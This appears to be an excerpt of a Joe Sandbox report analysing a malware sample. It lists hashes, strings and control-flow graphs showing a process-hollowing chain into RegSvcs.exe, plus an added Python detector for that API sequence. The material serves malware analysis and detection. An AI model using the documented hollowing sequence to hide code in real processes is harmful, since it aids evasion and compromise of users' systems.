                                                                  • Opcode ID: 997e39560e214e0feb5667ff00b55ebea716846a6c53f84a3171789d6c29bb3e
                                                                  • Instruction ID: 0a702d95f2a747d67b1d1c3d2254a63b24a74c900a385798a130b2930f35e34b
                                                                  • Opcode Fuzzy Hash: 997e39560e214e0feb5667ff00b55ebea716846a6c53f84a3171789d6c29bb3e
                                                                  • Instruction Fuzzy Hash: B4E19D30608741DFD726CF28CC84B6ABBE1BB84364F144AADF5A58B2E1D774D985CB42
                                                                  Strings
                                                                  • RTL: Acquire Exclusive Sem Timeout %d (%I64u secs), xrefs: 01707B7F
                                                                  • RTL: Resource at %p, xrefs: 01707B8E
                                                                  • RTL: Re-Waiting, xrefs: 01707BAC
                                                                  Memory Dump Source
                                                                  • Source File: 0000000A.00000002.2622319197.0000000001660000.00000040.00001000.00020000.00000000.sdmp, Offset: 01660000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_10_2_1660000_RegSvcs.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID: RTL: Acquire Exclusive Sem Timeout %d (%I64u secs)$RTL: Re-Waiting$RTL: Resource at %p
                                                                  • API String ID: 0-871070163
                                                                  • Opcode ID: cff435f2427336ce3be008bf44fa192e9d5763a490c89394ce1d5f5191894780
                                                                  • Instruction ID: 7666088592a66616d80094d4dd895ba080295b3902d2079159c0fbc46def6a0f
                                                                  • Opcode Fuzzy Hash: cff435f2427336ce3be008bf44fa192e9d5763a490c89394ce1d5f5191894780
                                                                  • Instruction Fuzzy Hash: 7A41B0317047039BD725DE2DCC41B6AB7E5EB98B50F100A2DE9AA9B780DB71E8058B91
                                                                  APIs
                                                                  • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 0170728C
                                                                  Strings
                                                                  • RTL: Acquire Shared Sem Timeout %d(%I64u secs), xrefs: 01707294
                                                                  • RTL: Resource at %p, xrefs: 017072A3
                                                                  • RTL: Re-Waiting, xrefs: 017072C1
                                                                  Memory Dump Source
                                                                  • Source File: 0000000A.00000002.2622319197.0000000001660000.00000040.00001000.00020000.00000000.sdmp, Offset: 01660000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_10_2_1660000_RegSvcs.jbxd
                                                                  Similarity
                                                                  • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
                                                                  • String ID: RTL: Acquire Shared Sem Timeout %d(%I64u secs)$RTL: Re-Waiting$RTL: Resource at %p
                                                                  • API String ID: 885266447-605551621
                                                                  • Opcode ID: a2bce8fe6d697afbce8f41471176fcedfd67b8fafca3a2c4065b0f492ffea13a
                                                                  • Instruction ID: 6d769f06e83daddb6815f33e2f2c7c554389969d13913f60a77fbdf0f40fddf2
                                                                  • Opcode Fuzzy Hash: a2bce8fe6d697afbce8f41471176fcedfd67b8fafca3a2c4065b0f492ffea13a
                                                                  • Instruction Fuzzy Hash: 29411031609306ABC725CE29CC42B6AF7E5FB94B10F10461CF995AB280DB30F8168BD1
                                                                  APIs
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 0000000A.00000002.2622319197.0000000001660000.00000040.00001000.00020000.00000000.sdmp, Offset: 01660000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_10_2_1660000_RegSvcs.jbxd
                                                                  Similarity
                                                                  • API ID: ___swprintf_l
                                                                  • String ID: %%%u$]:%u
                                                                  • API String ID: 48624451-3050659472
                                                                  • Opcode ID: 7ff02e992a60070415e9a48d5cda44b9434f5c757566ea2d641aa31c148e5c9c
                                                                  • Instruction ID: 563014a51f3a1fa8674c028ce2732196d0218c9ec6c5880a46fc9e9ceaaa6d3b
                                                                  • Opcode Fuzzy Hash: 7ff02e992a60070415e9a48d5cda44b9434f5c757566ea2d641aa31c148e5c9c
                                                                  • Instruction Fuzzy Hash: 01318472A00219AFDB20DF2DDC44BEEB7F8EB44610F55455AF949E3201EB30EA548BA0
                                                                  APIs
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 0000000A.00000002.2622319197.0000000001660000.00000040.00001000.00020000.00000000.sdmp, Offset: 01660000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_10_2_1660000_RegSvcs.jbxd
                                                                  Similarity
                                                                  • API ID: __aulldvrm
                                                                  • String ID: +$-
                                                                  • API String ID: 1302938615-2137968064
                                                                  • Opcode ID: 0e72ee8b5e9315034f2b46ff5b251d52fedc42f24a18d50ff17db184198f4ea1
                                                                  • Instruction ID: 78534a15ea92d789a89ceeb2f6ce91ef977ecd850135ad0a39c53dfb988806c9
                                                                  • Opcode Fuzzy Hash: 0e72ee8b5e9315034f2b46ff5b251d52fedc42f24a18d50ff17db184198f4ea1
                                                                  • Instruction Fuzzy Hash: A591BF71E0021A9AEB34CF6DCC81ABEBBA5EF84328F14455AE955E73C0D7309941CB62
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 0000000A.00000002.2622319197.0000000001660000.00000040.00001000.00020000.00000000.sdmp, Offset: 01660000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_10_2_1660000_RegSvcs.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID: $$@
                                                                  • API String ID: 0-1194432280
                                                                  • Opcode ID: e42d82ffea1c1c0c706c003e2fbc4ba577b2e813a86ef4e3aaae9bdf13d9a176
                                                                  • Instruction ID: fbc2fee0d8bcf334896e806c2d250082045b9d7df9ff3ae0ee7fc8b2ead92896
                                                                  • Opcode Fuzzy Hash: e42d82ffea1c1c0c706c003e2fbc4ba577b2e813a86ef4e3aaae9bdf13d9a176
                                                                  • Instruction Fuzzy Hash: 198119B1D002699BDB31CB54CC54BEEBBB8AB48714F1041EEEA19B7240D7309E85CFA4
                                                                  APIs
                                                                  • @_EH4_CallFilterFunc@8.LIBCMT ref: 0171CFBD
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 0000000A.00000002.2622319197.0000000001660000.00000040.00001000.00020000.00000000.sdmp, Offset: 01660000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_10_2_1660000_RegSvcs.jbxd
                                                                  Similarity
                                                                  • API ID: CallFilterFunc@8
                                                                  • String ID: @$@4Dw@4Dw
                                                                  • API String ID: 4062629308-3936743583
                                                                  • Opcode ID: b934065cbecc0df1f9bc85fe30211c85a268e450c5a6b3acd69cc328167aaf4c
                                                                  • Instruction ID: 65bf5fc28d07d8cbd078a36fabd16222c5431741c1ba0ea446de0e74b9c03935
                                                                  • Opcode Fuzzy Hash: b934065cbecc0df1f9bc85fe30211c85a268e450c5a6b3acd69cc328167aaf4c
                                                                  • Instruction Fuzzy Hash: CB418AB19402159FDB21AFADC844AAEFBB9FF54B10F10412EEA05DB258D730C801CBA5

                                                                  Execution Graph

                                                                  Execution Coverage:9%
                                                                  Dynamic/Decrypted Code Coverage:100%
                                                                  Signature Coverage:0%
                                                                  Total number of Nodes:155
                                                                  Total number of Limit Nodes:8
execution_graph (node edge list condensed to the API-resolving paths; node addresses as in the graph)
• RegSvcs region (process 10): 1649cf0 -> 1649b6c -> 1649b7c -> 1649b9c -> 1649bcc -> 1649bfc -> 164d420 -> 164f078 -> 164f0c6 KiUserCallbackDispatcher -> 164f0f0
• Entry 7facfb2 -> 7facf96 and entry 7fad1a3 -> 7facf9c both reach the dispatcher at 7faf088 / 7faf098 (12 API calls each), which loops back to 7facf96 via 7faf0d6 and fans out to the 57b0xxx helpers below
• 57b0106 (4 API calls) -> 7facb74 / 7facb80 -> 7facd6e CreateProcessA -> 7facdcb
• 57b04cb (4 API calls) -> 57b06f0 -> 7fac831 / 7fac838 -> 7fac878 VirtualAllocEx -> 7fac8b5, then 57b0174 -> Wow64SetThreadContext, exit 57b08db
• 57b0754 (2 API calls), 57b0647, 57b019f, 57b0798 (4 API calls each) -> 7fac8f1 / 7fac8f8 -> 7fac940 WriteProcessMemory -> 7fac997; 57b0647, 57b019f and 57b0798 continue through 57b0174 to Wow64SetThreadContext
• 57b0168, 57b0530, 57b0912 (2 API calls each) and 57b0174 from the helpers above -> 7fac320 / 7fac328 -> 7fac36d Wow64SetThreadContext -> 7fac3b5
• 57b02f9, 57b018c, 57b029d (2 API calls each) -> 7fac270 / 7fac278 -> 7fac2b8 ResumeThread -> 7fac2e9 -> 57b0224 -> 7faf0d6
• 57b034c (2 API calls) -> 57b0352 -> 7fac9e0 / 7fac9e8 -> 7faca33 ReadProcessMemory -> 7faca77 -> 57b0375 -> 7faf0d6
• 57b0f10 -> 57b0f36 -> 57b1188 / 57b1190 PostMessageW -> 57b11fc (alternative exit 57b109b)
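The API chain the execution graph above resolves (CreateProcessA, VirtualAllocEx, WriteProcessMemory, Wow64SetThreadContext, ResumeThread, with ReadProcessMemory alongside) is the process-hollowing pattern a detection engineer would want to alert on. As an added example that is not part of this Joe Sandbox report, the following Python scores a constructed API-call trace for that chain and fires only when a child created with CREATE_SUSPENDED receives allocation, writes and a thread-context rewrite before it is resumed. The "pid=... api=... key=value" line format, the handle values and the sample lines are assumptions made for the example; the sandbox's real trace format differs.

```python
# Added example (not part of the Joe Sandbox report): a small detector for the
# process-hollowing API chain that the execution graph above resolves
# (CreateProcessA -> VirtualAllocEx -> WriteProcessMemory ->
# Wow64SetThreadContext -> ResumeThread). The "pid=... api=... key=value"
# trace format and the sample lines below are constructed for this example.
import re
from dataclasses import dataclass, field

CREATE_SUSPENDED = 0x00000004  # dwCreationFlags bit; hollowing needs a suspended target

# Stage names for the chain; SetThreadContext and its Wow64 variant are one stage.
STAGE_OF = {
    "VirtualAllocEx": "alloc",
    "WriteProcessMemory": "write",
    "SetThreadContext": "setctx",
    "Wow64SetThreadContext": "setctx",
    "ResumeThread": "resume",
}
CHAIN = ("alloc", "write", "setctx", "resume")

# Constructed sample trace: one hollowing chain against RegSvcs.exe and one
# benign CreateProcess without CREATE_SUSPENDED (must not be flagged).
SAMPLE_TRACE = """\
pid=2948 api=CreateProcessA lpApplicationName=C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\RegSvcs.exe dwCreationFlags=0x00000004 hProcess=0x2b4 hThread=0x2b8
pid=2948 api=VirtualAllocEx hProcess=0x2b4 lpAddress=0x400000 dwSize=0x2a000 flProtect=0x40
pid=2948 api=WriteProcessMemory hProcess=0x2b4 lpBaseAddress=0x400000 nSize=0x400
pid=2948 api=WriteProcessMemory hProcess=0x2b4 lpBaseAddress=0x402000 nSize=0x1f000
pid=2948 api=ReadProcessMemory hProcess=0x2b4 lpBaseAddress=0x7ffde008 nSize=0x4
pid=2948 api=Wow64SetThreadContext hThread=0x2b8
pid=2948 api=ResumeThread hThread=0x2b8
pid=3112 api=CreateProcessA lpApplicationName=C:\\Windows\\System32\\notepad.exe dwCreationFlags=0x00000000 hProcess=0x1c0 hThread=0x1c4
pid=3112 api=ResumeThread hThread=0x1c4
"""

_TOKEN = re.compile(r"(\w+)=(\S+)")


@dataclass
class Target:
    """A child process created by the traced process, keyed by its handles."""
    image: str
    suspended: bool
    hprocess: str
    hthread: str
    stages: list = field(default_factory=list)  # distinct stages, in first-seen order
    writes: int = 0


def parse_line(line: str) -> dict:
    """Turn 'key=value key=value ...' into a dict (values stay as strings)."""
    return dict(_TOKEN.findall(line))


def detect_hollowing(trace: str) -> list:
    """Return one finding per suspended child that receives the full chain
    in order. A ReadProcessMemory (the graph's 7faca33 node) is tolerated
    but not required, as is any number of WriteProcessMemory calls."""
    by_process, by_thread, findings = {}, {}, []
    for line in trace.splitlines():
        f = parse_line(line)
        if "api" not in f:
            continue
        pid, api = f.get("pid"), f["api"]
        if api in ("CreateProcessA", "CreateProcessW"):
            flags = int(f.get("dwCreationFlags", "0"), 16)
            t = Target(image=f.get("lpApplicationName", "?"),
                       suspended=bool(flags & CREATE_SUSPENDED),
                       hprocess=f.get("hProcess", ""), hthread=f.get("hThread", ""))
            by_process[(pid, t.hprocess)] = t
            by_thread[(pid, t.hthread)] = t
            continue
        stage = STAGE_OF.get(api)
        t = by_process.get((pid, f.get("hProcess"))) or by_thread.get((pid, f.get("hThread")))
        if stage is None or t is None:
            continue
        if stage == "write":
            t.writes += 1
        if stage not in t.stages:
            t.stages.append(stage)
        # Fire only when the target was created suspended and the stages
        # appeared in the canonical order; an out-of-order subset is noise.
        if stage == "resume" and t.suspended and tuple(t.stages) == CHAIN:
            findings.append({"pid": int(pid), "target": t.image,
                             "hProcess": t.hprocess, "writes": t.writes,
                             "stages": list(t.stages)})
    return findings


if __name__ == "__main__":
    for hit in detect_hollowing(SAMPLE_TRACE):
        print(f"[hollowing] pid {hit['pid']} -> {hit['target']} "
              f"({hit['writes']} writes, stages {'>'.join(hit['stages'])})")
```

The ordering check is the point of the example: debuggers and some installers also pair CREATE_SUSPENDED with ResumeThread, so the detector refuses to fire unless a remote allocation, at least one remote write and a rewrite of the primary thread's context sit between the two, which is exactly the sequence the 57b0106 / 57b04cb / 57b0754 / 57b0168 / 57b02f9 helpers in the graph carry out.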

                                                                  Control-flow Graph

                                                                  • Executed
                                                                  • Not Executed
control_flow_graph 7facb74 (basic-block edge list condensed)
• entry 7facb74-7facc15, then three setup blocks with tight self-loops (7facc35-7facc44, 7facc8e-7facc9d, 7faccf6-7facd05) feeding 7facc4e-7facc6e, 7facca7-7faccd6 and 7facd0f-7facdc9
• 7facd0f-7facdc9 calls CreateProcessA (ref 07FACDB6) and branches to 7facdcb-7facdd1 or straight to 7facdd2-7face58
• the tail 7face5a-7facead passes through five small check blocks (7face60, 7face74, 7face88, 7face96-7face9c on the alternate edges) into 7faceaf-7facebe or 7facec4, ending in the self-looping block 7facec5
                                                                  APIs
                                                                  • CreateProcessA.KERNELBASE(?,?,?,?,?,?,?,?,?,?), ref: 07FACDB6
                                                                  Memory Dump Source
                                                                  • Source File: 0000000B.00000002.2569875582.0000000007FA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07FA0000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_11_2_7fa0000_rlJvZXSinaRi.jbxd
                                                                  Similarity
                                                                  • API ID: CreateProcess
                                                                  • String ID:
                                                                  • API String ID: 963392458-0
                                                                  • Opcode ID: d1f80a427fae64dc80b7975b1f5681da05e3adc51510fe25f0f01e9815a4a77e
                                                                  • Instruction ID: 61e5912ae84bb9e9690fb083ccd50cf9439a2802ac18268d702c9e918e851b18
                                                                  • Opcode Fuzzy Hash: d1f80a427fae64dc80b7975b1f5681da05e3adc51510fe25f0f01e9815a4a77e
                                                                  • Instruction Fuzzy Hash: 7FA15DB1D0025ADFDB20CF68C884BEDBBF2BF48714F1481A9D859A7240DB759985CFA1

                                                                  Control-flow Graph

                                                                  • Executed
                                                                  • Not Executed
control_flow_graph 7facb80 (basic-block edge list condensed; same body as the 7facb74 graph from a second entry)
• entry 7facb80-7facc15, then three setup blocks with tight self-loops (7facc35-7facc44, 7facc8e-7facc9d, 7faccf6-7facd05) feeding 7facc4e-7facc6e, 7facca7-7faccd6 and 7facd0f-7facdc9
• 7facd0f-7facdc9 calls CreateProcessA (ref 07FACDB6) and branches to 7facdcb-7facdd1 or straight to 7facdd2-7face58
• the tail 7face5a-7facead passes through five small check blocks (7face60, 7face74, 7face88, 7face96-7face9c on the alternate edges) into 7faceaf-7facebe or 7facec4, ending in the self-looping block 7facec5
                                                                  APIs
                                                                  • CreateProcessA.KERNELBASE(?,?,?,?,?,?,?,?,?,?), ref: 07FACDB6
                                                                  Memory Dump Source
                                                                  • Source File: 0000000B.00000002.2569875582.0000000007FA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07FA0000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_11_2_7fa0000_rlJvZXSinaRi.jbxd
                                                                  Similarity
                                                                  • API ID: CreateProcess
                                                                  • String ID:
                                                                  • API String ID: 963392458-0
                                                                  • Opcode ID: 5902c89dfd07de9f1b5007f5558b12ca315868e6db6c3b1691cc42bcb4ba72bd
                                                                  • Instruction ID: 0c7347c6d77c183cf12f5018d3d2b4cf2a11e337f6f3395f9b11c336fd310a93
                                                                  • Opcode Fuzzy Hash: 5902c89dfd07de9f1b5007f5558b12ca315868e6db6c3b1691cc42bcb4ba72bd
                                                                  • Instruction Fuzzy Hash: EC914EB1D0025ADFDB20CF69C844BDDBBF2BF48714F148569D819A7240DB749985CFA1

                                                                  Control-flow Graph

                                                                  • Executed
                                                                  • Not Executed
                                                                  control_flow_graph 246 7fac8f1-7fac946 248 7fac948-7fac954 246->248 249 7fac956-7fac995 WriteProcessMemory 246->249 248->249 251 7fac99e-7fac9ce 249->251 252 7fac997-7fac99d 249->252 252->251
                                                                  APIs
                                                                  • WriteProcessMemory.KERNELBASE(?,?,00000000,?,?), ref: 07FAC988
                                                                  Memory Dump Source
                                                                  • Source File: 0000000B.00000002.2569875582.0000000007FA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07FA0000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_11_2_7fa0000_rlJvZXSinaRi.jbxd
                                                                  Similarity
                                                                  • API ID: MemoryProcessWrite
                                                                  • String ID:
                                                                  • API String ID: 3559483778-0
                                                                  • Opcode ID: c1598b7d1c910333fa594023f4b2cd8bc1c5746d14436819b86a46fe03ce19c9
                                                                  • Instruction ID: 3263515a08e7793afd59c13bc55255c739e8e86d9143c19c5d7e9ce5ec27151e
                                                                  • Opcode Fuzzy Hash: c1598b7d1c910333fa594023f4b2cd8bc1c5746d14436819b86a46fe03ce19c9
                                                                  • Instruction Fuzzy Hash: 9C2146B58003499FDB10CFA9C880BEEBBF0BF88310F14842AE919A7250D7799944CBA0

                                                                  Control-flow Graph

                                                                  • Executed
                                                                  • Not Executed
                                                                  control_flow_graph 256 7fac320-7fac373 258 7fac383-7fac3b3 Wow64SetThreadContext 256->258 259 7fac375-7fac381 256->259 261 7fac3bc-7fac3ec 258->261 262 7fac3b5-7fac3bb 258->262 259->258 262->261
                                                                  APIs
                                                                  • Wow64SetThreadContext.KERNEL32(?,00000000), ref: 07FAC3A6
                                                                  Memory Dump Source
                                                                  • Source File: 0000000B.00000002.2569875582.0000000007FA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07FA0000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_11_2_7fa0000_rlJvZXSinaRi.jbxd
                                                                  Similarity
                                                                  • API ID: ContextThreadWow64
                                                                  • String ID:
                                                                  • API String ID: 983334009-0
                                                                  • Opcode ID: 5d4ff555754a2fb06014f851a074f6e0239f56fccfc78ccfb38b959aecbfcee8
                                                                  • Instruction ID: 8cddde66cb10f06149b477857948c4db4692e3eabae804fd6d9037dfeffdaaf0
                                                                  • Opcode Fuzzy Hash: 5d4ff555754a2fb06014f851a074f6e0239f56fccfc78ccfb38b959aecbfcee8
                                                                  • Instruction Fuzzy Hash: F1212AB1D003099FDB10CFAAC4857EEBBF4AF88324F14842ED559A7640D7799945CFA1

Control-flow Graph
• Basic blocks: 7fac8f8-7fac946; 7fac948-7fac954; 7fac956-7fac995 (calls WriteProcessMemory); 7fac99e-7fac9ce; 7fac997-7fac99d
• Edges: 7fac8f8 -> 7fac948, 7fac8f8 -> 7fac956, 7fac948 -> 7fac956, 7fac956 -> 7fac99e, 7fac956 -> 7fac997, 7fac997 -> 7fac99e
                                                                  APIs
                                                                  • WriteProcessMemory.KERNELBASE(?,?,00000000,?,?), ref: 07FAC988
                                                                  Memory Dump Source
                                                                  • Source File: 0000000B.00000002.2569875582.0000000007FA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07FA0000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_11_2_7fa0000_rlJvZXSinaRi.jbxd
                                                                  Similarity
                                                                  • API ID: MemoryProcessWrite
                                                                  • String ID:
                                                                  • API String ID: 3559483778-0
                                                                  • Opcode ID: 74f26f308aba3b3f6fcbc82142c3b9d053abd84fea885dd9ca02eb11488a0ca2
                                                                  • Instruction ID: 2bf18330185d5be456647e370a999fe766d0fafa42728e274c8d4c71978697cf
                                                                  • Opcode Fuzzy Hash: 74f26f308aba3b3f6fcbc82142c3b9d053abd84fea885dd9ca02eb11488a0ca2
                                                                  • Instruction Fuzzy Hash: F02128B59003499FDB10CFA9C884BDEBBF5FF48310F14842AE919A7250D779A944CBA4

Control-flow Graph
• Basic blocks: 7fac9e0-7faca75 (calls ReadProcessMemory); 7faca7e-7facaae; 7faca77-7faca7d
• Edges: 7fac9e0 -> 7faca7e, 7fac9e0 -> 7faca77, 7faca77 -> 7faca7e
                                                                  APIs
                                                                  • ReadProcessMemory.KERNELBASE(?,?,?,?,?), ref: 07FACA68
                                                                  Memory Dump Source
                                                                  • Source File: 0000000B.00000002.2569875582.0000000007FA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07FA0000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_11_2_7fa0000_rlJvZXSinaRi.jbxd
                                                                  Similarity
                                                                  • API ID: MemoryProcessRead
                                                                  • String ID:
                                                                  • API String ID: 1726664587-0
                                                                  • Opcode ID: e57cdaaf0ee522c2d0ed88fddd158dbfa7b97ca322587406644b08955049a565
                                                                  • Instruction ID: 8035868598e4b2c7815db900d7a377ae89936d24c55106fc96b77356fd5ab905
                                                                  • Opcode Fuzzy Hash: e57cdaaf0ee522c2d0ed88fddd158dbfa7b97ca322587406644b08955049a565
                                                                  • Instruction Fuzzy Hash: 2F2139B1C003499FDB10DFAAC884BEEBBF1FF48710F10842AE918A7250D7799940CBA1

Control-flow Graph
• Basic blocks: 7fac328-7fac373; 7fac383-7fac3b3 (calls Wow64SetThreadContext); 7fac375-7fac381; 7fac3bc-7fac3ec; 7fac3b5-7fac3bb
• Edges: 7fac328 -> 7fac383, 7fac328 -> 7fac375, 7fac383 -> 7fac3bc, 7fac383 -> 7fac3b5, 7fac375 -> 7fac383, 7fac3b5 -> 7fac3bc
                                                                  APIs
                                                                  • Wow64SetThreadContext.KERNEL32(?,00000000), ref: 07FAC3A6
                                                                  Memory Dump Source
                                                                  • Source File: 0000000B.00000002.2569875582.0000000007FA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07FA0000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_11_2_7fa0000_rlJvZXSinaRi.jbxd
                                                                  Similarity
                                                                  • API ID: ContextThreadWow64
                                                                  • String ID:
                                                                  • API String ID: 983334009-0
                                                                  • Opcode ID: 4fb1d6c8174f52500a98ae0fedba0878d13528e788468327569cfb9234c2160b
                                                                  • Instruction ID: 4a670b3d4e54d7eac78960fd26569069dc3b149694aa5eb455f4230d88336750
                                                                  • Opcode Fuzzy Hash: 4fb1d6c8174f52500a98ae0fedba0878d13528e788468327569cfb9234c2160b
                                                                  • Instruction Fuzzy Hash: 602118B1D003099FDB10DFAAC4847EEBBF4EF88724F14842AD559A7240D779A944CFA1

Control-flow Graph
• Basic blocks: 7fac9e8-7faca75 (calls ReadProcessMemory); 7faca7e-7facaae; 7faca77-7faca7d
• Edges: 7fac9e8 -> 7faca7e, 7fac9e8 -> 7faca77, 7faca77 -> 7faca7e
                                                                  APIs
                                                                  • ReadProcessMemory.KERNELBASE(?,?,?,?,?), ref: 07FACA68
                                                                  Memory Dump Source
                                                                  • Source File: 0000000B.00000002.2569875582.0000000007FA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07FA0000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_11_2_7fa0000_rlJvZXSinaRi.jbxd
                                                                  Similarity
                                                                  • API ID: MemoryProcessRead
                                                                  • String ID:
                                                                  • API String ID: 1726664587-0
                                                                  • Opcode ID: 024c0cecb1089659352b07d0c4074f479369eee23061b560fde3aefd20b9ab3a
                                                                  • Instruction ID: 3cf6ffb1e21821c28443d48f0917e5f94bfb0c490ff0d51a0e6889996286699b
                                                                  • Opcode Fuzzy Hash: 024c0cecb1089659352b07d0c4074f479369eee23061b560fde3aefd20b9ab3a
                                                                  • Instruction Fuzzy Hash: AF212AB1C003499FDB10CFAAC884BEEBBF5FF48710F50842AE519A7250C7799944CBA1

Control-flow Graph
• Basic blocks: 7fac831-7fac8b3 (calls VirtualAllocEx); 7fac8bc-7fac8e1; 7fac8b5-7fac8bb
• Edges: 7fac831 -> 7fac8bc, 7fac831 -> 7fac8b5, 7fac8b5 -> 7fac8bc
                                                                  APIs
                                                                  • VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 07FAC8A6
                                                                  Memory Dump Source
                                                                  • Source File: 0000000B.00000002.2569875582.0000000007FA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07FA0000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_11_2_7fa0000_rlJvZXSinaRi.jbxd
                                                                  Similarity
                                                                  • API ID: AllocVirtual
                                                                  • String ID:
                                                                  • API String ID: 4275171209-0
                                                                  • Opcode ID: 6012d4e1b9f52bffddcd5954dba32b28d54e974850380878b0e6b6336c75651f
                                                                  • Instruction ID: 1400892fc31ff387f6cdc842f2c7feb2ddb2fdea37efe988495da6ae4248cca2
                                                                  • Opcode Fuzzy Hash: 6012d4e1b9f52bffddcd5954dba32b28d54e974850380878b0e6b6336c75651f
                                                                  • Instruction Fuzzy Hash: 2B1147B28002499FDB10CFAAD844BEEBFF5FF88724F14881AD515A7250C775A954CFA0

Control-flow Graph
• Basic blocks: 7fac270-7fac2e7 (calls ResumeThread); 7fac2e9-7fac2ef; 7fac2f0-7fac315
• Edges: 7fac270 -> 7fac2e9, 7fac270 -> 7fac2f0, 7fac2e9 -> 7fac2f0
                                                                  APIs
                                                                  Memory Dump Source
                                                                  • Source File: 0000000B.00000002.2569875582.0000000007FA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07FA0000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_11_2_7fa0000_rlJvZXSinaRi.jbxd
                                                                  Similarity
                                                                  • API ID: ResumeThread
                                                                  • String ID:
                                                                  • API String ID: 947044025-0
                                                                  • Opcode ID: 975db18d72cb8bce24c3b806baba7f7cada629c12aab488f7dda78a9535b1917
                                                                  • Instruction ID: d2e8d7a484a9612777881ffe4596d9a85533e7096289503b022aa182f4b8700c
                                                                  • Opcode Fuzzy Hash: 975db18d72cb8bce24c3b806baba7f7cada629c12aab488f7dda78a9535b1917
                                                                  • Instruction Fuzzy Hash: C91134B18003498FDB20CFAAC4847EEBBF4AF88724F14845AC519A7650CB796945CFA1

Control-flow Graph
• Basic blocks: 7fac838-7fac8b3 (calls VirtualAllocEx); 7fac8bc-7fac8e1; 7fac8b5-7fac8bb
• Edges: 7fac838 -> 7fac8bc, 7fac838 -> 7fac8b5, 7fac8b5 -> 7fac8bc
                                                                  APIs
                                                                  • VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 07FAC8A6
                                                                  Memory Dump Source
                                                                  • Source File: 0000000B.00000002.2569875582.0000000007FA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07FA0000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_11_2_7fa0000_rlJvZXSinaRi.jbxd
                                                                  Similarity
                                                                  • API ID: AllocVirtual
                                                                  • String ID:
                                                                  • API String ID: 4275171209-0
                                                                  • Opcode ID: 303efdecd91741c7fd8081d607cba6f6405d317a8d293814f2fa22f4928569be
                                                                  • Instruction ID: 4eacb757894b47fcd1ac5be5c288b139d17475b8700688db424171cd21816ddc
                                                                  • Opcode Fuzzy Hash: 303efdecd91741c7fd8081d607cba6f6405d317a8d293814f2fa22f4928569be
                                                                  • Instruction Fuzzy Hash: 631126B18002499FDB10DFAAC844BEFBFF5EF88720F14881AE515A7250C775A944CFA1

Control-flow Graph
• Basic blocks: 164f078-164f0c4; 164f0c6-164f0ee (calls KiUserCallbackDispatcher); 164f112-164f12b; 164f0f7-164f10b; 164f0f0-164f0f6
• Edges: 164f078 -> 164f0c6, 164f078 -> 164f112, 164f0c6 -> 164f0f7, 164f0c6 -> 164f0f0, 164f0f7 -> 164f112, 164f0f0 -> 164f0f7
                                                                  APIs
                                                                  • KiUserCallbackDispatcher.NTDLL(0000004B), ref: 0164F0DD
                                                                  Memory Dump Source
                                                                  • Source File: 0000000B.00000002.2554268698.0000000001640000.00000040.00000800.00020000.00000000.sdmp, Offset: 01640000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_11_2_1640000_rlJvZXSinaRi.jbxd
                                                                  Similarity
                                                                  • API ID: CallbackDispatcherUser
                                                                  • String ID:
                                                                  • API String ID: 2492992576-0
                                                                  • Opcode ID: cf0efd7bb5e18c065d4b3478b1095c6fb003315a3552536033c107217bfe21cd
                                                                  • Instruction ID: e8fd0a3746387d34b43276653a3120a97fc7efc252ce86cac6e4f1a072fe3934
                                                                  • Opcode Fuzzy Hash: cf0efd7bb5e18c065d4b3478b1095c6fb003315a3552536033c107217bfe21cd
                                                                  • Instruction Fuzzy Hash: F811BFB1905389CFDB10DF5AC9047DEBFF4EB49714F108499D588A7242D379AA04CBA1

Control-flow Graph
• Basic blocks: 7fac278-7fac2e7 (calls ResumeThread); 7fac2e9-7fac2ef; 7fac2f0-7fac315
• Edges: 7fac278 -> 7fac2e9, 7fac278 -> 7fac2f0, 7fac2e9 -> 7fac2f0
                                                                  APIs
                                                                  Memory Dump Source
